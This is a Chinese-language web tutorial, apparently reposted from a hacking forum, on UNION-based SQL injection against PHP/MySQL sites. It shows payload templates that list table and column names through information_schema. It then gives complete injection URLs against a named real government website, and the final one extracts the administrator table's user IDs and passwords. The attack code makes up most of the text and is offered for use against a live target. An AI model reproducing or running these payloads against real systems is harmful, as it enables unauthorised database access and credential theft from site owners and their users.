刀城技术网-信息安全,服务器安全维护,网站安全维护

当前位置: 网站主页 > 数据安全 > MYSQL注入 >

php+MySql注入非暴力爆字段名

时间:2012-06-06 12:01来源:http://bbs.blackbap.org 作者:o0白月娜0o 点击:
作者:Mr.Cool 原文地址: http://bbs.blackbap.org/thread-1220-1-1.html 科普: 《php+MySql注入非暴力爆数据库表段》的原文: 表可以爆了,出来了,字段出不来怎么办?其实字段也可以查出 查表段时的格式是: +union select 1,2,3,table_name from (selec

作者:o0白月娜0ol
原文地址:
http://bbs.blackbap.org/thread-1220-1-1.html

科普:
《php+MySql注入非暴力爆数据库表段》的原文:
http://www.daokers.cn/a/shujukuanquan/MYSQLshujuku/2012/0606/607.html

表可以爆了,出来了,字段出不来怎么办?其实字段也可以查出
查表段时的格式是:
+union select 1,2,3,table_name from (select * from information_schema.tables where table_schema=数据库名字的hex order by table_schema limit 6,1)t limit 1--

那么,查字段的格式就是:
+union select 1,2,column_name from (select * from information_schema.columns where table_name=爆出来的表名的hex值 and table_schema=数据库名的hex值 order by 1 limit 2,1)t limit 1--

与爆表类似
在最后一个limit 6,1很明显是范围,从0,1、1,1、2,1、3,1的这么查下去就可以了,直到查出来想要的表名
看一个实例:
爆表:
http://www.ykxs.gov.cn/newinfo.php?id=125+and+1=2+union+select+1,2,3,table_name,5,6,7,8,9,10+from+(select+*+from+information_schema.tables+where+table_schema=0x796B7873676F76+order+by+table_schema+limit+0,1)t+limit+1--

爆字:
http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,column_name,4,5+from+(select+*+from+information_schema.columns+where+table_name=0x61646D696E6973747261746F72+and+table_schema=0x796B7873676F76+order+by+1+limit+2,1)t+limit+1--

使用前面爆出来的:
http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,concat(uid,0x5f,pwd)+from+administrator



(责任编辑:刀)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
验证码:点击我更换图片
栏目列表
推荐内容